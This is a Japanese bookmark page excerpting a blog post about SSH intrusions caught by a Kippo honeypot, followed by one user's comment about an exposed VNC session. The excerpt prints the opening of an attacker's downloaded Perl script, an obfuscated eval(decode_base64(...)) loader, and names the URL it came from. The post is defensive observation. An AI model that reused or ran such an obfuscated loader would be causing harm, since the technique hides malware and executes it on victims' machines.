タグ

ブックマーク / atani.github.io (1)

  • SSH不正侵入、観察日記

    不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy

    hatomugicha
    hatomugicha 2015/07/14
    IPv6有効化しつつip6tablesを止めたまま寝ちゃって、上位のONUがIPv6アクセスフリーになっててVNC乗り放題にしてた時に目が覚めてモニター見たらイギリスの工務店ぽいサイトからgzipを落としてる最中に出くわしたの思い出した
  • 1